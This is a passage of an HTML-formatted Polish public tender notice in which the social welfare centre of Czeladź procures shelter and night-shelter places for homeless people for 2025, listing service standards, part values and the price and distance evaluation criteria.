produktów o wartości kalorycznej jednego posiłku odpowiedniej dla osób dorosłych. Dopuszcza się możliwość przygotowania posiłku<br/>w ramach treningu kulinarnego. Przygotowywanie i wydawanie posiłków musi się odbywać zgodnie<br/>z warunkami przewidzianymi w postanowieniach odpowiednich przepisów sanitarnych, epidemiologicznych<br/>i higienicznych,<br/>3) oddzielne łóżko wraz z pościelą,<br/>4) wydzielone miejsce w szafie, krzesło oraz miejsce przy stole,<br/>5) warunki sanitarne umożliwiające utrzymanie higieny osobistej, w tym zapewnienie podstawowych środków czystości: ciepła woda, mydło, szampon, papier toaletowy, proszek do prania itp.,<br/>6) bielizna osobista oraz odzież i obuwie odpowiednie do pory roku dla osób tego pozbawionych,<br/>7) pomieszczenie świetlicy umożliwiające spędzenie czasu wolnego,<br/>8) warunki lokalowe przystosowane dla osób niepełnosprawnych,<br/>9) miejsce na przechowywanie rzeczy osobistych,<br/>10) miejsce do przygotowywania i spożywania posiłków,<br/>11) gorące napoje w okresie występowania niskich temperatur, <br/>12) możliwość dokonania codziennych zabiegów higienicznych,<br/>13) niezbędne środki czystości,<br/>14) niezbędną odzież na czas konieczny do wyprania i wysuszenia odzieży własnej, <br/>15) możliwość prania, suszenia oraz prasowania swojej odzieży, <br/>16) w przypadkach tego wymagających - udzielanie pomocy w zaspokajaniu codziennych potrzeb życiowych, pomoc przy spożywaniu posiłków, czynnościach higienicznych (mycie, kąpiel, przesłanie łóżka, podawanie zaleconych przez lekarza leków),<br/>17) dostęp do bezpłatnej, ogólnodostępnej 1 (jednej) lodówki,<br/>18) dostęp do bezpłatnego, ogólnodostępnego 1 (jednego) odbiornika telewizyjnego, znajdującego się<br/>w świetlicy Schroniska,<br/>19) niezbędną pomoc w załatwianiu spraw osobistych,<br/>20) w okresie występowania niskich temperatur oraz w przypadkach nagłych, wykonawca nie może odmówić przyjęcia osoby bezdomne z terenu gminy Czeladź do Schroniska. O przyjęciu bezdomnego wykonawca niezwłocznie zawiadomi zamawiającego, nie później niż 1 dzień roboczy po przedmiotowym przyjęciu, celem wydania pisemnej zgody osoby upoważnionej przez zamawiającego na dalsze przebywanie przyjętej osoby w placówce,<br/>21) w okresie występowania niskich temperatur, wykonawca zobowiązany jest do udostępnienia bezdomnym dodatkowych, prowizorycznych miejsc noclegowych w ilości dopuszczonej stosownymi przepisami prawa<br/>(w tym przepisami ppoż i BHP) i możliwościami organizacyjnymi,<br/>22) wykonawca zobowiązany będzie dysponować kadrą niezbędną do realizacji zadania,<br/>23) wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu badania:<br/>a) stanu realizacji umowy, <br/>b) efektywności, rzetelności i jakości realizacji umowy, <br/>c) prawidłowości prowadzonej dokumentacji dotyczącej realizacji zamówienia, a w szczególności list obecności bezdomnych,<br/>24) Osoby przebywające w schronisku pobyt swój potwierdzać będą każdorazowo, w godzinach porannych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/><br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 61137,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust.1 pkt.7 ustawy pzp, tj. zamówień polegających na powtórzeniu podobnych usług. Zamówienie o którym mowa powyżej może dotyczyć całego zakresu czynności zamówienia podstawowego szczegółowo opisanego w opisie przedmiotu zamówienia dla części II – maksymalnie 2 osoby przez 365 dni</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag<br/>(znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt<br/>oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz MOPS w Czeladzi-max 40%(O).Oferty zostaną ocen za<br/>pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60<br/>pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt<br/>przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w<br/>ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby MOPS w Czeladzi–(O).Ocena pkt w tym kryt zostanie<br/>dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu<br/>schroniska/noc do siedziby MOPS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby MOPS w Czeladzi“ liczonej w linii<br/>prostej w promieniu do 30 km od siedziby MOPS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40<br/>pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny<br/>najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C–<br/>liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby MOPS w<br/>Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim<br/>adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby MOPS w Czeladzi znajduje się dana placówka, Zamaw<br/>przyjmuje, że placów znajd się powyż 30km od siedziby MOPS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do<br/>siedz MOPS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która<br/>otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na<br/>to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez<br/>Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio<br/>złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert<br/>oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst<br/>ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem<br/>najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zamaw terminie<br/>pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o<br/>wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp.<br/>Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty;-<br/>wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta<br/>z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę<br/>kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o<br/>takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ,<br/>czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg<br/>unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby MOPS w Czeladzi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część III:<br/>Udzielenie schronienia w schronisku dla osób bezdomnych z usługami opiekuńczymi – dla 7 osób (kobiet lub mężczyzn) <br/>Usługa polegająca na udzieleniu schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych będzie realizowane zgodnie z: ustawą o pomocy społecznej z dnia 12 marca 2004 r. (t.j. Dz. U. z 2024r. poz. 1283 z późn. zm.) oraz Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r.<br/>(Dz.U. z 2018 r. poz. 896).<br/><br/>Schronisko powinno gwarantować: <br/><br/>Okres świadczenia usług: Schronisko dla osób bezdomnych świadczy usługi przez cały rok, przez 7 dni<br/>w tygodniu.<br/>Forma świadczonej usługi: Możliwość całodobowego przebywania w schronisku, w tym zapewnienie miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>1) całodobowy dostęp do lokalu, w którym będzie realizowane zadanie,<br/>2) codzienne wyżywienie: 3 posiłki dziennie (śniadanie, obiad, kolacja) w tym 1 gorący posiłek- obiad, przygotowane z zasadami racjonalnego żywienia z pełnowartościowych produktów o wartości kalorycznej jednego posiłku odpowiedniej dla osób dorosłych. Dopuszcza się możliwość przygotowania posiłku<br/>w ramach treningu kulinarnego. Przygotowywanie i wydawanie posiłków musi się odbywać zgodnie<br/>z warunkami przewidzianymi w postanowieniach odpowiednich przepisów sanitarnych, epidemiologicznych<br/>i higienicznych,<br/>3) oddzielne łóżko wraz z pościelą,<br/>4) wydzielone miejsce w szafie, krzesło oraz miejsce przy stole,<br/>5) warunki sanitarne umożliwiające utrzymanie higieny osobistej, w tym zapewnienie podstawowych środków czystości: ciepła woda, mydło, szampon, papier toaletowy, proszek do prania itp.,<br/>6) bielizna osobista oraz odzież i obuwie odpowiednie do pory roku dla osób tego pozbawionych,<br/>7) pomieszczenie świetlicy umożliwiające spędzenie czasu wolnego,<br/>8) warunki lokalowe przystosowane dla osób niepełnosprawnych,<br/>9) miejsce na przechowywanie rzeczy osobistych,<br/>10) miejsce do przygotowywania i spożywania posiłków,<br/>11) gorące napoje w okresie występowania niskich temperatur, <br/>12) możliwość dokonania codziennych zabiegów higienicznych,<br/>13) niezbędne środki czystości,<br/>14) niezbędną odzież na czas konieczny do wyprania i wysuszenia odzieży własnej, <br/>15) możliwość prania, suszenia oraz prasowania swojej odzieży, <br/>16) w przypadkach tego wymagających - udzielanie pomocy w zaspokajaniu codziennych potrzeb życiowych, pomoc przy spożywaniu posiłków, czynnościach higienicznych (mycie, kąpiel, przesłanie łóżka, podawanie zaleconych przez lekarza leków),<br/>17) dostęp do bezpłatnej, ogólnodostępnej 1 (jednej) lodówki,<br/>18) dostęp do bezpłatnego, ogólnodostępnego 1 (jednego) odbiornika telewizyjnego, znajdującego się<br/>w świetlicy Schroniska,<br/>19) niezbędną pomoc w załatwianiu spraw osobistych,<br/>20) w okresie występowania niskich temperatur oraz w przypadkach nagłych, wykonawca nie może odmówić przyjęcia osoby bezdomne z terenu gminy Czeladź do Schroniska. O przyjęciu bezdomnego wykonawca niezwłocznie zawiadomi zamawiającego, nie później niż 1 dzień roboczy po przedmiotowym przyjęciu, celem wydania pisemnej zgody osoby upoważnionej przez zamawiającego na dalsze przebywanie przyjętej osoby w placówce,<br/>21) w okresie występowania niskich temperatur, wykonawca zobowiązany jest do udostępnienia bezdomnym dodatkowych, prowizorycznych miejsc noclegowych w ilości dopuszczonej stosownymi przepisami prawa<br/>(w tym przepisami ppoż i BHP) i możliwościami organizacyjnymi,<br/>22) wykonawca zobowiązany będzie dysponować kadrą niezbędną do realizacji zadania,<br/>23) wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu badania:<br/>a) stanu realizacji umowy, <br/>b) efektywności, rzetelności i jakości realizacji umowy, <br/>c) prawidłowości prowadzonej dokumentacji dotyczącej realizacji zamówienia, a w szczególności list obecności bezdomnych,<br/>24) Osoby przebywające w schronisku pobyt swój potwierdzać będą każdorazowo, w godzinach porannych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/><br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 269552,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art. 214 ust.1 pkt.7 ustawy pzp, tj. zamówień polegających na powtórzeniu podobnych usług. Zamówienie o którym mowa powyżej może dotyczyć całego zakresu czynności zamówienia podstawowego szczegółowo opisanego w opisie przedmiotu zamówienia dla części III – maksymalnie 2 osoby przez 365 dni</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag<br/>(znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt<br/>oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz MOPS w Czeladzi-max 40%(O).Oferty zostaną ocen za<br/>pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60<br/>pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt<br/>przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w<br/>ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby MOPS w Czeladzi–(O).Ocena pkt w tym kryt zostanie<br/>dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu<br/>schroniska/noc do siedziby MOPS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby MOPS w Czeladzi“ liczonej w linii<br/>prostej w promieniu do 30 km od siedziby MOPS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40<br/>pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny<br/>najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C–<br/>liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby MOPS w<br/>Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim<br/>adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby MOPS w Czeladzi znajduje się dana placówka, Zamaw<br/>przyjmuje, że placów znajd się powyż 30km od siedziby MOPS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do<br/>siedz MOPS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która<br/>otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na<br/>to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez<br/>Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio<br/>złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert<br/>oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst<br/>ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem<br/>najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zamaw terminie<br/>pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o<br/>wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp.<br/>Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty;-<br/>wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta<br/>z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę<br/>kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o<br/>takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ,<br/>czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg<br/>unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby MOPS w Czeladzi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część IV:<br/>Udzielenie schronienia w noclegowni – dla kobiet lub mężczyzn – 1<br/>Noclegownia powinna gwarantować: <br/><br/>Noclegownia zapewnia schronienie osobom bezdomnym, świadcząc tymczasową pomoc w postaci miejsca noclegowego, w ramach której umożliwia spędzenie nocy w warunkach gwarantujących ochronę życia<br/>i zdrowia. <br/>Okres świadczenia usług: Noclegownia czynna jest cały rok, przez 7 dni w tygodniu, w godzinach:<br/>od 1 października do 31 marca od 1800 do 800<br/>od 1 kwietnia do 30 września od 1900 do 700<br/><br/>Forma świadczonej usługi: Tymczasowe schronienie w postaci miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/><br/>Zakres usług: <br/>a) umożliwienie spożycia posiłku i zapewnienie gorącego napoju, <br/>b) umożliwienie skorzystania z prysznica oraz wymiany odzieży, <br/>c) zapewnienie dezynfekcji i dezynsekcji odzieży w przypadku braku możliwości jej wymiany, <br/>d) zapewnienie opieki przez co najmniej 1 opiekuna na nie więcej niż 50 osób przebywających w placówce.<br/>Pomieszczenia noclegowe: z co najmniej 1 otwieranym oknem na pomieszczenie lub wentylacją przewidzianą dla pomieszczeń mieszkalnych bez otwieranych okien. Pomieszczenia noclegowe ze swobodnym dostępem do łóżek. Miejsca do spania wyposażone w materac i komplet pościeli (tj. poduszkę, koc, prześcieradło i pokrycie na koc).<br/>Pomieszczenia sanitariatów: zapewniające stały dostęp do bieżącej ciepłej i zimnej wody oraz gwarantujące możliwość przeprowadzenia zabiegów higienicznych.<br/>Jadalnia/świetlica: Pomieszczenie do spożywania posiłków, które poza porami posiłków może pełnić funkcję świetlicy lub sali spotkań grupowych.<br/>Pomieszczenia biurowe: Wydzielone pomieszczenie do prac biurowych oraz indywidualnych rozmów<br/>z osobami bezdomnymi.<br/>Magazyn odzieży, bielizny, pościeli: Pomieszczenia wyposażone w regały, szafy i inne meble umożliwiające wymianę ubrań.<br/>Magazyn środków chemicznych: Wydzielone pomieszczenie na środki czystości i higieny.<br/>Pralnia: Wydzielone pomieszczenie wyposażone co najmniej w 1 pralkę dla 30 osób.<br/><br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- prowadzenie rejestru osób prowadzonych w placówce<br/>- osoby przebywające w noclegowni pobyt swój potwierdzać będą każdorazowo, w godzinach wieczornych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach<br/>- w okresie grzewczym zapewnienie odpowiedniej temperatury pomieszczeń<br/>- prowadzenie pracy socjalnej w tym: motywowanie osób bezdomnych do podjęcia terapii odwykowej, pomocy w załatwieniu spraw urzędowych i osobistych, podjęcia aktywności zawodowej, wzmocnienia aktywności i samodzielności osób bezdomnych.<br/><br/>Placówka musi spełniać wymagania określone w Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r. (Dz.U. z 2018 r. poz. 896). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11800,45 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag<br/>(znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt<br/>oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz MOPS w Czeladzi-max 40%(O).Oferty zostaną ocen za<br/>pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60<br/>pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt<br/>przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w<br/>ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby MOPS w Czeladzi–(O).Ocena pkt w tym kryt zostanie<br/>dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu<br/>schroniska/noc do siedziby MOPS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby MOPS w Czeladzi“ liczonej w linii<br/>prostej w promieniu do 30 km od siedziby MOPS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40<br/>pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny<br/>najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C–<br/>liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby MOPS w<br/>Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim<br/>adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby MOPS w Czeladzi znajduje się dana placówka, Zamaw<br/>przyjmuje, że placów znajd się powyż 30km od siedziby MOPS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do<br/>siedz MOPS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która<br/>otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na<br/>to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez<br/>Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio<br/>złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert<br/>oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst<br/>ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem<br/>najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zamaw terminie<br/>pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o<br/>wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp.<br/>Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty;-<br/>wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta<br/>z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę<br/>kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o<br/>takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ,<br/>czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg<br/>unieważ umowy w sprawie 